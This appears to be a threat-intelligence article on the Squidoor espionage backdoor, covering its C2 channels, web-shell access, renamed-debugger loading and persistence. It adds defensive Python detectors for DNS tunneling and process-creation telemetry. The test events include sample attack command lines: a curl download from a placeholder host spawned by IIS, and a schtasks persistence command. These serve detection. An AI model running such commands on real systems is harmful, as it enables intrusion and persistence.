A highly sophisticated malware known as “Squidoor” has surfaced, targeting key sectors such as government, defense, telecommunications, education, and aviation in Southeast Asia and South America. Believed to be the work of a Chinese threat actor tracked as activity cluster CL-STA-0049, Squidoor has been designed to infiltrate networks, maintain persistence, and extract sensitive data using advanced techniques.
This modular backdoor is specifically crafted for stealth and adaptability, making it a potent tool for cyber espionage. One of the standout features of Squidoor is its utilization of multi-protocol command-and-control (C2) techniques. By employing various covert communication methods like Outlook API, DNS tunneling, and ICMP tunneling, Squidoor can interact with its C2 servers seamlessly. The flexibility of this malware is evident with the Windows variant supporting ten different C2 communication methods, while the Linux version offers nine options. These methods include HTTP-based communication, reverse TCP/UDP connections, named pipes for internal communication, and even posing as an Outlook mail client using the Microsoft Graph API. The use of the Outlook API for communication adds an extra layer of complexity, making it harder to detect malicious activities amidst legitimate network traffic.
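The DNS tunneling channel mentioned above is the one a network defender can most readily look for in passive DNS or resolver logs, because encoded data has to be carried in the query names themselves. The following Python is an added example written for this article, not code from the Squidoor report or from ANY.RUN. It parses a constructed DNS query log (the log format, the sample lines, the hypothetical tunnel-example.net domain and every threshold are assumptions) and flags registered domains whose subdomains are long, high-entropy, rarely repeated, or mostly queried as TXT/NULL records, the classic signature of data smuggled through DNS.

```python
"""
Heuristic detection of DNS-tunnelled C2 over a constructed DNS query log.
Added example for the article, not code from the Squidoor report or ANY.RUN;
the log format, thresholds and sample lines are assumptions.
"""
import math
from collections import defaultdict

# Constructed sample log, one query per line: "<timestamp> <client> <qtype> <qname>".
# The tunnel-example.net lines imitate encoded data carried in long, high-entropy
# subdomain labels with TXT lookups; the remaining lines are ordinary traffic.
SAMPLE_LOG = """\
2025-03-01T10:00:01Z 10.0.0.5 A www.example.com
2025-03-01T10:00:02Z 10.0.0.5 A cdn.example.com
2025-03-01T10:00:03Z 10.0.0.5 AAAA mail.example.com
2025-03-01T10:00:04Z 10.0.0.5 A www.example.com
2025-03-01T10:00:05Z 10.0.0.7 TXT 4a7d1ed414474e4033ac29ccb8653d9b.f3e2a1.tunnel-example.net
2025-03-01T10:00:06Z 10.0.0.7 TXT 9c3b1f8e0d2a4b6c8e1f3a5b7c9d0e2f.a19f0c.tunnel-example.net
2025-03-01T10:00:07Z 10.0.0.7 TXT 0f1e2d3c4b5a69788796a5b4c3d2e1f0.b7d4e9.tunnel-example.net
2025-03-01T10:00:08Z 10.0.0.7 TXT 5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b.c0ffee.tunnel-example.net
2025-03-01T10:00:09Z 10.0.0.9 A login.microsoftonline.com
"""


def shannon_entropy(text: str) -> float:
    """Bits per character: encoded or encrypted payloads score high, hostnames low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (registered domain, subdomain). Treating the last two labels as the
    registered domain is a simplification; production code should use the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_log(text: str):
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of aborting the whole run
        ts, client, qtype, qname = parts
        domain, sub = split_name(qname)
        records.append({"ts": ts, "client": client, "qtype": qtype.upper(),
                        "domain": domain, "sub": sub})
    return records


def profile_domains(records):
    """Aggregate per registered domain the signals tunneling tends to distort."""
    prof = defaultdict(lambda: {"queries": 0, "txt": 0, "sub_len": 0.0,
                                "entropy": 0.0, "subs": set()})
    for r in records:
        p = prof[r["domain"]]
        p["queries"] += 1
        p["txt"] += r["qtype"] in ("TXT", "NULL")      # record types that carry bulk data
        p["sub_len"] += len(r["sub"])
        p["entropy"] += shannon_entropy(r["sub"].replace(".", ""))
        p["subs"].add(r["sub"])                         # unique subdomains defeat caching
    return prof


def score_domains(profiles, min_queries=3, len_thr=30, ent_thr=3.2,
                  txt_thr=0.5, uniq_thr=0.9):
    """Flag a domain when at least two independent tunneling indicators fire.
    All thresholds are assumptions to be tuned against local baseline traffic."""
    findings = {}
    for domain, p in profiles.items():
        if p["queries"] < min_queries:
            continue
        avg_len = p["sub_len"] / p["queries"]
        avg_ent = p["entropy"] / p["queries"]
        txt_ratio = p["txt"] / p["queries"]
        uniq_ratio = len(p["subs"]) / p["queries"]
        reasons = []
        if avg_len >= len_thr:
            reasons.append(f"long subdomains (avg {avg_len:.1f} chars)")
        if avg_ent >= ent_thr:
            reasons.append(f"high-entropy subdomains (avg {avg_ent:.2f} bits)")
        if txt_ratio >= txt_thr:
            reasons.append(f"bulk record types ({txt_ratio:.0%} TXT/NULL)")
        if uniq_ratio >= uniq_thr:
            reasons.append(f"almost never repeated ({uniq_ratio:.0%} unique)")
        if len(reasons) >= 2:
            findings[domain] = {"queries": p["queries"], "txt_ratio": txt_ratio,
                                "avg_entropy": avg_ent, "reasons": reasons}
    return findings


def detect(log_text: str = SAMPLE_LOG):
    return score_domains(profile_domains(parse_log(log_text)))


if __name__ == "__main__":
    for domain, finding in detect().items():
        print(domain, finding)
```

Requiring two indicators keeps single oddities such as a CDN with many unique hostnames from paging an analyst; the per-client and per-domain query volume over time, which the sample omits, is the next signal to add when running this against a real resolver log.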
Furthermore, Squidoor gains initial access by exploiting vulnerabilities in Internet Information Services (IIS) servers and deploying web shells such as OutlookDC.aspx and TimeoutAPI.aspx. These web shells act as persistent gateways for executing commands on compromised systems. The malware then spreads laterally within networks using tools like curl and Impacket, often disguising payloads as genuine files to avoid detection.
Persistence is a key aspect of Squidoor’s operation, achieved through living-off-the-land binaries and scripts (LOLBAS) techniques. By using Microsoft’s Console Debugger (cdb.exe) renamed as fontdrvhost.exe, Squidoor can load shellcode directly into memory, bypassing traditional antivirus detection. Scheduled tasks are utilized to execute Squidoor’s payloads upon system startup, ensuring continued access and operation within the compromised network.
The modular architecture of Squidoor allows for a wide range of capabilities, including host reconnaissance, arbitrary command execution, file exfiltration, payload delivery, and lateral communication between infected endpoints. The malware also supports code injection into processes like mspaint.exe or conhost.exe to evade security tools effectively. Additional modules enable attackers to execute PowerShell scripts without invoking the PowerShell binary or carry out pass-the-hash attacks.
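The initial-access, persistence and injection behaviours described in the three paragraphs above (web shells on IIS spawning tools such as curl, cdb.exe renamed to fontdrvhost.exe, scheduled tasks that launch it at startup, and injection into mspaint.exe or conhost.exe) all leave traces in process-creation telemetry, which is where an endpoint defender would hunt for them. The Python below is an added example for this article, not code from the Squidoor report or from ANY.RUN. It runs four hunting rules over constructed events whose field names mirror Sysmon Event ID 1 (Image, OriginalFileName, CommandLine, ParentImage); every event, path, task name and parent-process allow-list is an assumption, and the rules key on the renamed debugger's embedded original file name, a Windows binary name appearing outside System32, a schtasks /create whose action points outside trusted directories, an injection host started by an unexpected parent, and an IIS worker spawning a command-line tool.

```python
"""
Rule-based triage of process-creation events for the tradecraft described above:
web-shell command execution on IIS, a renamed Console Debugger used as a loader,
scheduled tasks that launch it, and injection hosts started by odd parents.
Added example; field names mirror Sysmon Event ID 1, but every event is
constructed and every allow-list and path prefix is an assumption.
"""
import ntpath
import re

LOLBAS_LOADERS = {"cdb.exe"}                          # debuggers abused as shellcode loaders
INJECTION_HOSTS = {"mspaint.exe", "conhost.exe"}      # injection targets named in the article
WEB_SERVER_WORKERS = {"w3wp.exe"}                     # IIS worker process
SUSPICIOUS_WEB_CHILDREN = {"cmd.exe", "powershell.exe", "curl.exe"}
EXPECTED_HOST_PARENTS = {"explorer.exe", "svchost.exe", "csrss.exe", "cmd.exe"}  # assumption
TRUSTED_TASK_PREFIXES = ("c:\\windows\\", "c:\\program files")                    # assumption
SYSTEM_BINARY_NAMES = {"fontdrvhost.exe"}             # genuine copy lives under System32
SYSTEM32 = "c:\\windows\\system32\\"

# Constructed events: 1 and 5 are benign, 2/3/4/6 model the behaviours in the article.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs", "ParentImage": r"C:\Windows\System32\services.exe"},
    {"id": 2, "Image": r"C:\ProgramData\Fonts\fontdrvhost.exe", "OriginalFileName": "CDB.Exe",
     "CommandLine": r"C:\ProgramData\Fonts\fontdrvhost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"id": 3, "Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks.exe /create /sc onstart /tn FontCache '
                    r'/tr "C:\ProgramData\Fonts\fontdrvhost.exe" /ru SYSTEM',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"id": 4, "Image": r"C:\Windows\System32\mspaint.exe", "OriginalFileName": "mspaint.exe",
     "CommandLine": "mspaint.exe", "ParentImage": r"C:\ProgramData\Fonts\fontdrvhost.exe"},
    {"id": 5, "Image": r"C:\Windows\System32\mspaint.exe", "OriginalFileName": "mspaint.exe",
     "CommandLine": "mspaint.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"id": 6, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe -o update.dat http://placeholder.invalid/update.dat",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe"},
]

TR_ARG = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def basename(path):
    return ntpath.basename(path or "").lower()


def rule_renamed_loader(ev):
    """Renaming cdb.exe changes the file name, not the PE version resource."""
    orig = (ev.get("OriginalFileName") or "").lower()
    img = basename(ev["Image"])
    reasons = []
    if orig in LOLBAS_LOADERS and img != orig:
        reasons.append(f"PE original name {orig} running as {img}")
    if img in SYSTEM_BINARY_NAMES and not ev["Image"].lower().startswith(SYSTEM32):
        reasons.append(f"system binary name {img} outside System32")
    return "; ".join(reasons)


def rule_scheduled_task(ev):
    """schtasks /create whose /tr action lives outside trusted directories."""
    cmd = ev.get("CommandLine", "")
    if basename(ev["Image"]) != "schtasks.exe" or "/create" not in cmd.lower():
        return ""
    m = TR_ARG.search(cmd)
    if not m:
        return ""
    target = (m.group(1) or m.group(2)).lower()
    if not target.startswith(TRUSTED_TASK_PREFIXES):
        return f"task action outside trusted paths: {target}"
    return ""


def rule_injection_host(ev):
    """mspaint.exe/conhost.exe launched by something other than a usual parent."""
    img, parent = basename(ev["Image"]), basename(ev.get("ParentImage"))
    if img in INJECTION_HOSTS and parent not in EXPECTED_HOST_PARENTS:
        return f"{img} started by unexpected parent {parent}"
    return ""


def rule_webshell_child(ev):
    """An IIS worker should not be spawning shells or download tools."""
    img, parent = basename(ev["Image"]), basename(ev.get("ParentImage"))
    if parent in WEB_SERVER_WORKERS and img in SUSPICIOUS_WEB_CHILDREN:
        return f"{img} spawned by web worker {parent}"
    return ""


RULES = {"renamed_loader": rule_renamed_loader, "scheduled_task": rule_scheduled_task,
         "injection_host": rule_injection_host, "webshell_child": rule_webshell_child}


def triage(events):
    """Return one hit per (event, rule) pair that fired."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            detail = rule(ev)
            if detail:
                hits.append({"id": ev["id"], "rule": name, "detail": detail})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The renamed-loader rule is the most durable of the four: the attacker controls the on-disk file name but not the OriginalFileName in the signed PE's version resource, so telemetry that records that field (Sysmon does) catches the rename regardless of what the binary is called. The parent-process allow-list for injection hosts is the rule most in need of local tuning.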
In conclusion, Squidoor marks a significant advancement in malware sophistication by blending stealthy communication channels with modular functionality to target high-value organizations. Its ability to operate on multiple platforms and mimic legitimate network traffic underscores the escalating threat posed by state-sponsored cyber actors. Security professionals are advised to enhance their detection capabilities and utilize advanced threat prevention tools to counteract such threats effectively.
As cyber threats continue to evolve, staying informed about the latest malware and phishing attacks is crucial. Tools like ANY.RUN TI Lookup provide valuable threat intelligence to help organizations identify and respond to emerging cyber threats. By staying vigilant and proactive, businesses can enhance their cybersecurity posture and protect their digital assets from malicious actors.